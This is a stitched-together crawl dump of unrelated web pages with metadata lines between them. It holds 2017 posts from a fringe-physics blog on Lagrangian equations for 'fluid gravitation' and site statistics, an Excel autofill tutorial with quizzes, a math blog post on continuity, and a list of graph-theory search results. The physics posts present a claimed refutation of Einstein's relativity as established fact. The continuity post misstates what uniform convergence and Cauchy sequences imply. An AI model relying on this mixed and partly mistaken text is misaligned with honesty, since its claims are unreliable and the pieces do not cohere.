They can also be distributed to the starving poor of many countries.\n\n### Daily Report 29/3/17\n\nFriday, March 31st, 2017\n\nThe equivalent of 81,576 printed pages was downloaded (297.426 megabytes) from 2,239 downloaded memory files and 406 distinct visits each averaging 3.9 memory pages and 6 minutes, printed pages to hits ratio of 36.43, to referrals total of 2,223,687, main spiders Google, MSN and Yahoo. Collected ECE2 1686, Top ten 1484, Collected Evans / Morris 957(est), F3(Sp) 630, Collected scientometrics 542, Principles of ECE 398, Barddoniaeth 232, Evans Equations 194, Collected Eckardt / Lindstrom papers 151(est), Autobiography volumes one and two 125, Collected Proofs 104, UFT88 89, Self charging inverter 84, Engineering Model 78, UFT311 76, Mann Johnson ECE 73, PLENR 59, ECE2 59, CEFE 54, Llais 44, Idaho 29, UFT321 22, UFT313 29, UFT314 19, UFT315 22, UFT316 17, UFT317 19, UFT318 13, UFT319 22, UFT320 16, UFT322 35, UFT323 20, UFT324 25, UFT325 32, UFT326 16, UFT327 21, UFT328 23, UFT329 20, UFT330 15, UFT331 20, UFT332 19, UFT333 16, UFT334 14, UFT335 36, UFT336 15, UFT337 14, UFT338 17, UFT339 16, UFT340 15, UFT341 31, UFT342 26, UFT343 31, UFT344 30, UFT345 27, UFT346 24, UFT347 46, UFT348 27, UFT349 25, UFT351 41, UFT352 52, UFT353 35, UFT354 63, UFT355 39, UFT356 42, UFT357 37, UFT358 38, UFT359 39, UFT360 31, UFT361 13, UFT362 25, UFT363 40, UFT364 36, UFT365 22, UFT366 59, UFT367 35, UFT368 35, UFT369 44, UFT370 48, UFT371 59, UFT372 31, UFT373 9 to date in March 2017. University of Adelaide Proof One; University of Oriente Santiago de Cuba UFT169(Sp); Bosch Company Germany Spacetime Devices; Deusu search engine Home Page; University of Baguio Philippines (on edu) general; Marine Hydrographic and Oceanographic Service France UFT351, UFT353, UFT357, UFT358; The Campaign for the Protection of Rural Wales Home Page; National Electrification authority Philippines general. Intense interest all sectors, updated usage file attached for March 2017.\n\n# Unauthorized\n\nThis server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn’t understand how to supply the credentials required.\n\nAdditionally, a 401 Unauthorized error was encountered while trying to use an ErrorDocument to handle the request.\n\n### 374(3): Equations for the Precessing Orbit of Fluid Gravitation\n\nThursday, March 30th, 2017\n\nIn the first instance, Eqs. (27) to (29) can be solved numerically using Maxima to check that the method gives the correct orbit (18). Then the algorithm can be modified to solve Eqs. (37), (38) and (40 numerically using a model for the function x defined in Eq. (31). Finally Eq. (44) can be added if the fluid is assumed to be incompressible, so both the orbit and x can be found. The caveat of this note explains why the note slightly corrects the equations of UFT363. The lagrangian method of UFT363 gives Eq. (47), which is different from the correct Eq. (37). The reason is that the kinetic energy of fluid gravitation, Eq. (48), is not in the required format (49) demanded by the Hamilton Principle of Least Action. The kinetic energy must be T(r bold dot, r bold). 
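For readers who do not have the background notes to hand, the standard classical case that these posts keep referring to (the momentum defined as p = partial L / partial r-dot, the Leibniz equation, and the constant angular momentum) can be reproduced symbolically in a few lines. The sketch below, in SymPy, assumes only the textbook plane-polar Lagrangian of classical dynamics; the fluid-dynamic factor x = 1 + partial R sub r / partial r and the numbered equations of the notes are deliberately not reproduced here.

```python
import sympy as sp

t = sp.symbols('t')
m = sp.symbols('m', positive=True)
r = sp.Function('r')(t)
theta = sp.Function('theta')(t)
U = sp.Function('U')(r)              # central potential U(r)

# Plane-polar Lagrangian of classical dynamics (no fluid correction):
# L = T - U with T = (m/2)*(rdot**2 + r**2*thetadot**2)
L = sp.Rational(1, 2)*m*(r.diff(t)**2 + r**2*theta.diff(t)**2) - U

# Momenta obtained, as the posts emphasize, from p = partial L / partial qdot
p_r = sp.diff(L, r.diff(t))           # m*rdot
p_theta = sp.diff(L, theta.diff(t))   # m*r**2*thetadot, the angular momentum

# Euler-Lagrange equations: d/dt(partial L/partial qdot) - partial L/partial q = 0
el_r = sp.diff(p_r, t) - sp.diff(L, r)              # gives m*rddot - m*r*thetadot**2 + dU/dr (the Leibniz equation when set to zero)
el_theta = sp.diff(p_theta, t) - sp.diff(L, theta)  # gives d/dt(m*r**2*thetadot), so p_theta is conserved

print(p_r, p_theta)
print(sp.simplify(el_r))
print(sp.simplify(el_theta))
```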
Sometimes it is simpler and clearer to derive results without the Lagrange method using both the Lagrange and Hamilton equations of motion.\n\na374thpapernotes3.pdf\n\n### Basics of the Lagrangian Method\n\nThursday, March 30th, 2017\n\nThe fundamental reason for the last note is that the Hamilton Principle of Least Action, from which is follows that the lagrangian must be defined as T(r bold dot) – U(r bold). I will explain this in another note to be distributed shortly. This method holds for any r bold dot. The method used in UFT363 did not satisfy the fundamental criterion for a lagrangian, which is why it did not lead to the correct momentum. The new method of UFT374 corrects this and leads to soluble sets of simultaneous partial differential equations. The new advance is that these can be tied in with the equations of hydrodynamics in many interesting ways. for background reading I suggest Marion and Thornton chapter five. So UFT374 will develop in this way. I recommend Marion and Thornton as far as it goes. It is now known that its section on the Einstein theory is wildly wrong. This was again shown by Horst’s numerical methods combined with analytical methods. Marion and Thornton is not easy, but is recommended reading. I remember doing lagrangian theory in the second year mathematics course at UCW Aberystwyth. It i snot easy, but sometimes useful. I have used it many times throughput my research career. Sometimes it is better to use other methods. The method of UFT374 uses all the available dynamics, Lagrangian and Hamiltonian. UFT176 on the discovery of the quantum Hamilton equations, is now a famous paper, a classic by any standards. There is a hugely successful combination of analytical and numerical techniques in each UFT paper, mainly by Horst Eckardt, Douglas Lindstrom and myself, and many contributions by other Fellows.\n\n### UFT88 read at Pierre et Marie Curie Astrophysics Institute\n\nThursday, March 30th, 2017\n\nUniversite Pierre et Marie Curie (Paris 6) is the best university in France at present. It is ranked 39 in the world by Shanghai, 121 by Times, 141 by QS and 175 by webometrics. It has 32,000 students on the Jussieu Campus of the Latin Quarter of Paris. The University of Paris is the second oldest on mainland Europe after Bologna founded in the second half of the twelfth century by Robert de Sorbon. The oldest university in Europe was Bangor Tewdos, founded in the fourth or fifth centuries, but completely destroyed by raiders. The Astrophysics Institute is situated next to the famous Paris Observatory and was founded in 1936, opening in 1952. UPMC is affiliated with the Sorbonne and CNRS. It includes the Institute Henri Poincare, where Jean-Pierre Vigier , co author of “The Enigmatic Photon”, Omnia Opera of www.aias.us) was a professor for many years, starting as an assistant to the Nobel Laureate Louis de Broglie. Vigier immediately accepted B(3) and probably nominated it for a Nobel Prize, or used his influence to have it recognized and nominated. UPMC has produced several famous Nobel Laureates, including Pierre Curie, Marie Curie (two Nobel Prizes), Henri Bequerel, Louis de Broglie, Frederic Joliot, Irene Joliot-Curie and Pierre Gilles de Gennes, whom I heard lecture on liquid crystals at Aberystwyth during a conference I helped organize. In the student risings of 1968 to 1970 there were prolonged clashes between the students and the police. The students occupied the Sorbonne and declared it an autonomous People’s Republic. 
This occurred when I was an undergraduate at Aberystwyth (1968 to 1971) as described in Autobiography Volume Two. The radical atmosphere of the Parisian student Rising pervaded the campus at Aberystwyth and also all the Campi in the United States after the Kent State shootings. UFT88 is a famous classic paper by now, it was published in 2007 and corrects the second Bianchi identity for torsion, leading to the complete geometrical refutation of the Einstein relativity and another revolution, the post Einsteinian paradigm shift in natural philosophy. So www.aias.us and www.upitec.org are read continuously at all the best universities in the world. The authorities of the old Ministry of Truth in physics try not to notice.\n\n### Daily Report 28/3/17\n\nThursday, March 30th, 2017\n\nThe equivalent of 93,405 printed pages was downloaded (340.556 megabytes) from 2,108 downloaded memory files (hits) and 424 distinct visits each averaging 4.4 memory pages and 6 minutes, printed pages to hits ratio of 44.31, top referrals total 2,223,504, main spiders Google, MSN and Yahoo. Collected ECE2 1606, Top ten 1546, Collected Evans / Morris 924(est), F3(Sp) 622, Collected scientometrics 520, Principles of ECE 394, Barddoniaeth 230, Evans Equations 191, Collected Eckardt / Lindstrom 151, Autobiography volumes one and two 124, Collected Proofs 98, UFT88 89, Self charging inverter 78, Engineering Model 77, Mann Johnson ECE 72, PLENR 58, ECE2 57, CEFE 51, Llais 43, UFT311 39, UFT321 21, UFT313 29, UFT314 16, UFT315 19, UFT316 15, UFT317 19, UFT318 12, UFT319 20, UFT320 15, UFT322 33, UFT323 19, UFT324 25, UFT325 32, UFT326 14, UFT327 21, UFT328 20, UFT329 19, UFT330 15, UFT331 20, UFT332 17, UFT333 16, UFT334 13, UFT335 32, UFT336 13, UFT337 14, UFT338 17, UFT339 14, UFT340 15, UFT341 31, UFT342 24, UFT343 28, UFT344 28, UFT345 25, UFT346 22, UFT347 43, UFT348 26, UFT349 23, UFT351 39, UFT352 50, UFT353 32, UFT354 61, UFT355 37, UFT356 40, UFT357 35, UFT358 35, UFT359 37, UFT360 30, UFT361 12, UFT362 25, UFT363 40, UFT364 33, UFT365 21, UFT366 57, UFT367 35, UFT368 33, UFT369 44, UFT370 48, UFT371 59, UFT372 31, UFT373 8 to date in March 2017. University of Adelaide UFT142; University of Quebec Trois Rivieres UFT366 – UFT373; Bosch Company Germany ECE Devices; Steinbuch Centre for Computing Karlsruhe Institute for Technology Home page, Three World records by MWE, Nomination, B. Sc. Degree Ceremony; Stanford University general; Institut d’Astrophysique de Paris (Astrohysics Institute of Paris, Joint research centre of Pierre and Marie Curie University and the National Centre for Scientific Research (CNRS)) UFT88; French National Hydrographic Service (SHOM) UFT349, UFT370, ECE2 preprint; Campaign fro the Protection of Rural Wales home page; Pakistan Education and Research Network general; University of Warwick Newspaper cuttings. Intense interest all sectors, updated usage file attached for March 2017.\n\n# Unauthorized\n\nThis server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn’t understand how to supply the credentials required.\n\nAdditionally, a 401 Unauthorized error was encountered while trying to use an ErrorDocument to handle the request.\n\n### Discussion of 374(2)\n\nWednesday, March 29th, 2017\n\nThese are interesting comments. This note is based entirely on standard equations of the Lagrange and Hamilton dynamics applied to vectors, notably Eq. 
(3), which gives the correct momentum p from the Lagrangian (2); these are all contained in Marion and Thornton. The vector Euler Lagrange equation is Eq. (11), and leads correctly to the well known equations (20) and (21): the Leibniz equation and the equation of constraint. The kinetic energy is p dot p / (2m). The primary purpose of the note is to show that the correct momentum must be defined by p bold = partial lagrangian / partial r dot bold (see for example Marion and Thornton). Eqs. (22) – (24) work correctly for classical dynamics, but no longer work correctly for fluid dynamics. The correct momentum of fluid dynamics must be calculated from Eq. (3) using the lagrangian (35). The correct momentum is p bold = m v bold, where v bold is given by Eq. (26). This is the same as the momentum used in UFT363, and leads to Eqs. (33) and (34). The spin connection partial R sub r / partial r must be regarded in the same way as the potential energy U(r). Neither is a Lagrange variable. The key point is that the momentum p bold can be obtained correctly from the lagrangian (2) if and only if Eq. (3) is used. This is checked from the fact that p bold is r bold dot in Eq. (2). Then use the rules of differentiation with r dot bold. For classical dynamics, Eqs. (22) to (24) happen to work fortuitously, and these are of course the equations used by Marion and Thornton in their chapter seven. However, for fluid dynamics they no longer work, because the complete momentum is now:\n\np bold = x r dot e sub r bold + r theta dot e sub theta bold\n\nwhere\nx = (1 + partial R sub r / partial r)\n\nUsing this in Eqs. (2) and (3) gives the correct momentum from the correct lagrangian, containing the correct kinetic energy. The correct momentum is Eq. (28) multiplied by m. When used in Eq. (29) it leads to Eqs. (33) and (34). Eq. (33) is different from that found in UFT363, because in UFT363, the correct factor x in Eq. (33) turned out to be x squared, as in Eq. (39) of this note. Therefore the lagrangian (35) cannot be used with Eq. (38). This result is by no means obvious. It shows that there is a certain amount of subjectivity in the Lagrange method, as is well known. It is by no means obvious how to choose the Lagrange variables, and the choice of lagrangian is also subjective to some degree. These things emerge in, for example, quantum field theory. Fortunately the answer is simple: use Eq. (13), in which there is only one Lagrange variable, vector r bold. This leads to Eqs. (33) and (34). I suggest putting Eqs. (43) to (45) through Maxima to see how the orbital precession behaves. I do not think that the replacement of x squared of UFT363 by the correct x of this note will make any qualitative difference to the precession that you have already inferred numerically. It might affect the details of the precession, but the precession will remain.\n\nTo: [email protected]\nSent: 28/03/2017 14:40:47 GMT Daylight Time\nSubj: Re: 374(2): Complete Analysis of UFT363\n\nIt is difficult for me to understand this note for reasons of principle. My interpretation is the following:\n\nThe Lagrangian method is based on the kinetic energy and generalized coordinates. The Euler-Lagrange equations are based on the kinetic energy of the generalized coordinates. These coordinates are found by coordinate transformations. In our case the radial coordinate is transformed by\n\nr –> r + R_r(r)\n\nwhere R_r(r) is a “distortion” of radial motion of a particle inferred by fluid dynamics.
For the Lagrange mechanism this function has to be known a priori; it cannot result from the Euler-Lagrange equations. If we assume that the R_r function is to be determined by the dynamics, we need an additional equation of motion or state or whatever. In Lagrange theory, energy conservation is fulfilled. This is not necessarily the case if a “free floating” function is introduced. I guess that you had this in mind when saying that a Hamiltonian formulation is needed in addition to the Lagrangian formulation to determine the dynamics consistently.\n\nSo the question is where to take the conditions for R_r that must appear as a constraint in the Lagrange mechanism. The generalized coordinates should be r and theta, but what is the kinetic energy? Let’s assume that the velocity, eqs.(26,27) of the note, is that derived from the coordinate transformation. Then the Euler-Lagrange equations (33,34) are correct, although they contain an unspecified function R_r (which is not time dependent).\n\nI do not understand the part of the note after eqs.(33,34). Why do you introduce the Lagrangian (35)? Obviously this belongs to a different problem to be solved. And why should it be re-expressed to (36)? The momentum in Lagrange theory is a generalized momentum and need not have the form (37).\n\nOn page 6 of the manuscript I cannot decipher the sentence “It is not possible to choose … as Lagrange variables”. Which variables do you mean?\nEqs. (44) and (45) are derived from the same Euler-Lagrange equation and are not independent. It is true that (45) is a constant of motion but this is not suited for solving the equations because it is only of first order. What about using\n\nH = 1/2 m v^2 + U(r) = const.\n\ninstead? Then we can determine partial R_r/partial r, and replace it in (43,44) so that we have only derivatives of time and the equation system could be solved by Maxima for example. In general, the combination of Lagrange theory (which is for mass points primarily) and fluid dynamics (which is for distributed fields) may be a bit tricky.\n\nSorry for having written such a long sermon today.\nHorst\n\nOn 28.03.2017 at 10:44, EMyrone wrote:\n\nThis note shows that the complete Lagrangian and Hamiltonian formulations are needed to describe fluid dynamics self-consistently. When this is done UFT363 is slightly corrected to Eqs. (43) to (45), which can be solved simultaneously using Maxima to give the orbit and spin connection.\n\n### Chapter 5 of ECE2 and UFT373 in Spanish\n\nWednesday, March 29th, 2017\n\nMany thanks again!\n\nIn a message dated 28/03/2017 21:16:10 GMT Daylight Time, [email protected] writes:\n\nDone today\n\nDave\n\nOn 3/26/2017 12:36 PM, Alex Hill (ET3M) wrote:\n\nHello Dave,\n\nPlease find enclosed the Spanish version of Chapter 5 of the ECE2 book in pdf file, which I hope you can attach to the existing ECE2 Ch 1 to 4 pdf file in Spanish, since all five chapters are too heavy a file to mail by Yahoo.\n\nI am also enclosing the recent UFT373 file in Spanish, for posting.\n\nThanks.\n\nRegards,
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91126555,"math_prob":0.8879156,"size":26950,"snap":"2023-14-2023-23","text_gpt3_token_len":6795,"char_repetition_ratio":0.13133675,"word_repetition_ratio":0.50653666,"special_character_ratio":0.26482373,"punctuation_ratio":0.13531724,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9641215,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-07T23:01:08Z\",\"WARC-Record-ID\":\"<urn:uuid:10683f49-0e45-42b3-8ba8-334ca2891a20>\",\"Content-Length\":\"58639\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f456fc8f-381b-4874-ae56-13d79c53ef1b>\",\"WARC-Concurrent-To\":\"<urn:uuid:ab8188d3-a64b-478f-aedc-4a5dd50bfa41>\",\"WARC-IP-Address\":\"67.231.254.154\",\"WARC-Target-URI\":\"http://aias.us/blog/index3df6.html?m=201703\",\"WARC-Payload-Digest\":\"sha1:PP2D32MFUWNSOUJ2DMUUWDDKTJYGSQ2W\",\"WARC-Block-Digest\":\"sha1:JFLBEIVOCHSZ4S7HVDQZ2KPUSFRF26AE\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224654016.91_warc_CC-MAIN-20230607211505-20230608001505-00337.warc.gz\"}"}
http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/lesson3.htm
[ "### Programs: Microsoft Excel Chapter 3", null, ": Lesson 3", null, "Lesson #3: In this lesson you will learn how use Autofill and how to use the Pointing function.\n\nMain Objectives:\n• Autofill (Fill Handle)\n• Pointing\nAutofill and Pointing\nObjective # 1 Autofill", null, "Purpose nTo copy a cell or range of cells to an adjacent cell or range of cells To Use n-Select which cell you would like to copy. n-Point to the black square on the lower-right corner of the cell until the mouse changes shape. nDrag the mouse to the desired range you would like to copy the cells to. nA boarder should now appear around the area you would like to be copied. nThe process is now done once you unclick the mouse\nObjective # 2 Pointing", null, "Purpose: nTo make it easier not to make a mistake when typing a formula into a cell To use: nClick the cell in which you want to put the formula in. nType an equal sign (=).  The status bar should now say ‘enter mode.’ You can now continue to type the rest of the formula. n nPoint to the cell in which you want to reference the formula.  A border should appear around the cell and in the status bar, the words ‘point mode’ should appear. nNow you can continue to type in arithmetic operators to place the references in the formula.\n\nAfter completing the DEMO PROBLEM you will have enough visual basis and knowledge to work alone with excel in similar situation.\n\nExercises\n\n1. Excel is able to make a series of numbers and certain words\n\nTrue        False\n\n2. Arguments are when the computer is asked to do two things at once and it can’t decide which function to do\n\nTrue        False\n\n3. We use pointing so we make less mistakes\n\nTrue        False\n\n4. When using the fill handle we use the lower left corner to drag\n\nTrue        False\n\n5. You are in pointing mode when a moving box appears around the cell/s you selected\n\nTrue        False\n\n`1.The fill handle is the quickest way to copy a cell to where? `\n` a) The cells in A1`\n` b) The cells that are adjacent to the cell your working with`\n` c) The cells on a different excel document `\n` d) No cells are copied using the fill handle`\n\n`2.What is the first mode you should be in when you are pointing?`\n` a) Point mode`\n` b) Edit mode`\n` c) Enter mode`\n``` d) Ready mode\n```\n\n`3.What button do you push in the tool bar to access the Paste Function?`\n` a) Autosum (Sigma sign)`\n` b) Paste (clip board with little paper)`\n` c) Copy (two pieces of paper)`\n``` d) Insert Function (fx)\n```\n\n`4.What is the best way to average values in cells B1-B4?`\n` a) =B1+B2+B3+B4`\n` b) =Average(B1, B4)`\n` c) Neither a or b`\n``` d) both a and b are great ways to find the average\n```\n\n`5.5.Cells A1, A2 and A3 have the numbers 7, 10 and 1 respectively. If in A4 the function typed is =`\n`\tSum(A1: A3), then what will be the number that appears after you hit the `\n`\tenter key after the function?`\n` a) 3`\n` b) 18 `\n` c) 10`\n` d) 16`\n\n`6.6.When using the fill handle, what corner do you use to pull down to the range you would like?`\n` a) lower right`\n` b) lower left`\n` c) upper right`\n` d) upper left`\n\n[FrontPage Save Results Component]", null, "back to lesson #2\n\ncontinue to lesson #4", null, "", null, "Back to Lessons", null, "" ]
[ null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/r.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/excel.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/lesson6.jpg", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/lesson7.jpg", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/back.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/next.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/back.gif", null, "http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/next.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7544894,"math_prob":0.6904983,"size":1443,"snap":"2019-13-2019-22","text_gpt3_token_len":431,"char_repetition_ratio":0.108408615,"word_repetition_ratio":0.0,"special_character_ratio":0.27165627,"punctuation_ratio":0.0743034,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9601897,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,2,null,2,null,1,null,1,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-19T23:33:07Z\",\"WARC-Record-ID\":\"<urn:uuid:d9b7c1d4-ffb0-429d-9a1f-d9b97fc735c0>\",\"Content-Length\":\"31531\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:69ae88cb-8793-45c9-87c5-53cafdbbedf6>\",\"WARC-Concurrent-To\":\"<urn:uuid:916dd569-9c10-4016-8de7-debf63a3193b>\",\"WARC-IP-Address\":\"131.118.229.53\",\"WARC-Target-URI\":\"http://academic.pgcc.edu/~bspear/IntroMsOffice/AUTOptn/excel3/lesson3.htm\",\"WARC-Payload-Digest\":\"sha1:6WJVHCDHVI56NSUGUQMGE6NTNJ35BESV\",\"WARC-Block-Digest\":\"sha1:YDGP5GE3HKBZK4I7SN6F26WX5QFICMWD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202161.73_warc_CC-MAIN-20190319224005-20190320010005-00260.warc.gz\"}"}
https://math.portonvictor.org/2020/01/27/continuity-as-convergence-of-sequences-expanding-our-definition-of-continuity/
[ "", null, "# Continuity as Convergence of Sequences—Expanding Our Definition of Continuity\n\nI feel that continuity is best understood when we consider convergence at different levels of abstraction. While it’s fairly easy to understand the continuity of functions when they’re defined in spaces like R2, with standards like:\n\n• The left hand limit must equal the right hand limit.\n• The function should have a finite value at each point throughout any given domain.\n\nDefinitions like the ones I’ve mentioned above are also called definitions of continuity derived out of point-wise convergence. In general, a point-wise convergence definition of continuity looks something like this:\n\nThere are other more rigorous definitions for continuity, one of the common definitions that’s taught in beginner level calculus classes is:\n\nAll the conceptual analysis set aside, there are problems with these point-wise definitions of continuity and convergence because they don’t preserve boundedness or the continuity of functions. Anyone who’s taken higher level functional analysis would know that there are much more general definitions of continuity, which aren’t counter-intuitive or downright false.\n\nThese are called uniform-convergence definitions of continuity.\n\n## Uniform Convergence and Continuity\n\nTo be precise, uniform convergence directly implies continuity of the function across any domain or subset of the domain. This definition doesn’t take into account convergence of the values of x, rather, it looks at the convergence of sequences of functions. Put simply, if you can show that the function in question belongs to a sequence of functions that converge uniformly across any domain, then the function is continuous across the entire domain as well.  The formal definition is as follows:\n\nDefinition A: If a sequence {f\u001fn} of continuous functions fn: A→R converges uniformly on A⊂R to f: A→R, f is continuous on A.\n\nAs a method of proof, if you’re looking to prove that a certain function is continuous—all you need to prove is that the function in question belongs to a sequence of continuous functions on a domain A, which is a subset of the set of real numbers. Definition A, as I’ve written it above preserves the boundedness of sequences and preserves continuity in a way that’s not possible through the point-wise definition of convergence.\n\nThis definition A is a direct extension of Cauchy’s definition of uniform convergence, which is as follows:\n\nCauchy’s Definition of Uniform Convergence: A sequence {fn} of functions fn: A→ R is uniformly Cauchy on A if for every ε>0 there exists N∈N such that m, n>N implies that |fm(x) −fn(x)|<ε for all x∈ A.\n\nTo speak loosely, if the absolute difference between two successive functions belonging to the same sequence gets smaller, this implies that the sequence is converging. Assuming that such a convergence function exists, each function within the sequence is going to be continuous.\n\nIf you’re interested in studying continuity or the limits of functions, you should read Algebraic General Topology Volume 1. This book introduces my mathematical theory that generalizes limits across arbitrary discontinuous functions. As always, I’m open to new ideas and thoughts on my work and welcome open debate on any issue you find." ]
[ null, "https://i0.wp.com/math.portonvictor.org/wp-content/uploads/2020/01/Continuity-as-Convergence-of-Sequences-Expanding-Our-Definition-of-Continuity.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9094004,"math_prob":0.9518058,"size":3228,"snap":"2021-43-2021-49","text_gpt3_token_len":634,"char_repetition_ratio":0.1957196,"word_repetition_ratio":0.023715414,"special_character_ratio":0.18773234,"punctuation_ratio":0.086440675,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98244,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-11-29T08:04:55Z\",\"WARC-Record-ID\":\"<urn:uuid:5f5ad737-d924-41ac-9f0a-202a8dbc5c6f>\",\"Content-Length\":\"76254\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c2fe59c3-29b7-47de-ab5c-b098f21f99e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:ed4a4ba2-b749-45e6-a1a5-e19ff9c9f081>\",\"WARC-IP-Address\":\"104.236.49.103\",\"WARC-Target-URI\":\"https://math.portonvictor.org/2020/01/27/continuity-as-convergence-of-sequences-expanding-our-definition-of-continuity/\",\"WARC-Payload-Digest\":\"sha1:KSVQWOWISOZYQBVBI44DZVLMNAOLEBD5\",\"WARC-Block-Digest\":\"sha1:XJC2IMJ5BFYLD34QONPLNYSV5FLUBZ3Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964358702.43_warc_CC-MAIN-20211129074202-20211129104202-00601.warc.gz\"}"}
https://scholar.archive.org/search?q=Enumeration+and+maximum+number+of+minimal+dominating+sets+for+chordal+graphs.
[ "Filters\n\n512 Hits in 6.3 sec\n\n### Minimal dominating sets in graph classes: Combinatorial bounds and enumeration\n\nJean-François Couturier, Pinar Heggernes, Pim van 't Hof, Dieter Kratsch\n2013 Theoretical Computer Science\nThere is a graph on n vertices with 15 n/6 minimal dominating sets. This gives a lower bound of 1.5704 n for the maximum number of minimal dominating sets.  ...  This gives a lower bound of 1.5704 n for the maximum number of minimal dominating sets. Graph classes Our work is dealing with some well-known graph classes.  ...\n\n### Enumerating minimal connected dominating sets in graphs of bounded chordality\n\nPetr A. Golovach, Pinar Heggernes, Dieter Kratsch\n2016 Theoretical Computer Science\nWe establish enumeration algorithms as well as lower and upper bounds for the maximum number of minimal connected dominating sets in such graphs.  ...  In particular, we present algorithms to enumerate all minimal connected dominating sets of chordal graphs in time O(1.7159 n ), of split graphs in time O(1.3803 n ), and of AT-free, strongly chordal, and  ...  In this paper we initiate the study of the enumeration and maximum number of minimal connected dominating sets in a given graph.  ...\n\n### Enumeration of Enumeration Algorithms [article]\n\nKunihiro Wasa\n2016 arXiv   pre-print\nIn this paper, we enumerate enumeration problems and algorithms. This survey is under construction. If you know some results not in this survey or there is anything wrong, please let me know.  ...  Reference 2.12.15 Enumeration of all minimal dominating sets in a chordal bipartite graph Input A chordal bipartite graph G. Output All minimal dominating sets in G.  ...  Reference 2.12.14 Enumeration of all minimal dominating sets in a P 6 -free chordal graph Input A P 6 -free chordal graph G = (V, E). Output All minimal dominating sets in G.  ...\n\n### A Note on the Maximum Number of Minimal Connected Dominating Sets in a Graph [article]\n\nFaisal N. Abu-Khzam\n2021 arXiv   pre-print\nThis improves the previously known lower bound of Ω(1.4422^n) and reduces the gap between lower and upper bounds for input-sensitive enumeration of minimal connected dominating sets in general graphs as  ...  We prove constructively that the maximum possible number of minimal connected dominating sets in a connected undirected graph of order n is in Ω(1.489^n).  ...  In this note we report an improved lower bound on the maximum number of minimal connected dominating sets in a graph.  ...\n\n### A Polynomial Delay Algorithm for Enumerating Minimal Dominating Sets in Chordal Graphs [article]\n\nMamadou Moustapha Kanté and Vincent Limouzy and Arnaud Mary and Lhouari Nourine and Takeaki Uno\n2014 arXiv   pre-print\nWe give a polynomial delay algorithm to list the set of minimal dominating sets in chordal graphs, an important and well-studied graph class where such an algorithm was open for a while.  ...  An output-polynomial algorithm for the listing of minimal dominating sets in graphs is a challenging open problem and is known to be equivalent to the well-known Transversal problem which asks for an output-polynomial  ...  For the enumeration of minimal dominating sets in chordal graphs the simplest strategy consists in following this ordering as follows.  
...\n\n### A Polynomial Delay Algorithm for Enumerating Minimal Dominating Sets in Chordal Graphs [chapter]\n\nMamadou Moustapha Kanté, Vincent Limouzy, Arnaud Mary, Lhouari Nourine, Takeaki Uno\n2016 Lecture Notes in Computer Science\nWe give a polynomial delay algorithm to list the set of minimal dominating sets in chordal graphs, an important and well-studied graph class where such an algorithm was open for a while.  ...  An output-polynomial algorithm for the listing of minimal dominating sets in graphs is a challenging open problem and is known to be equivalent to the well-known Transversal problem which asks for an output-polynomial  ...  For the enumeration of minimal dominating sets in chordal graphs the simplest strategy consists in following this ordering as follows.  ...\n\n### Minimal Dominating Sets in Graph Classes: Combinatorial Bounds and Enumeration [chapter]\n\nJean-François Couturier, Pinar Heggernes, Pim van't Hof, Dieter Kratsch\n2012 Lecture Notes in Computer Science\nFor several classes of graphs, we substantially improve the upper bound on the maximum number of minimal dominating sets in graphs on n vertices.  ...  For all considered graph classes, the upper bound proofs are constructive and can easily be transformed into algorithms enumerating all minimal dominating sets of the input graph.  ...  showed that all minimal dominating sets in a split graph G can be enumerated in time polynomial in the number of minimal dominating sets of G.  ...\n\n### On the maximum number of minimal connected dominating sets in convex bipartite graphs [article]\n\n2019 arXiv   pre-print\nOur algorithm implies a corresponding upper bound for the number of minimal connected dominating sets for this graph class.  ...  The enumeration of minimal connected dominating sets is known to be notoriously hard for general graphs.  ...  In this paper we study the enumeration and maximum number of minimal connected dominating sets in convex bipartite graphs, and we prove that the number of minimal connected dominating sets in a convex  ...\n\n### Enumeration and maximum number of minimal connected vertex covers in graphs\n\nPetr A. Golovach, Pinar Heggernes, Dieter Kratsch\n2018 European journal of combinatorics (Print)\nFor graphs of bounded chordality, we are able to give a better upper bound, and for chordal graphs and distance-hereditary graphs we are able to give tight bounds on the maximum number of 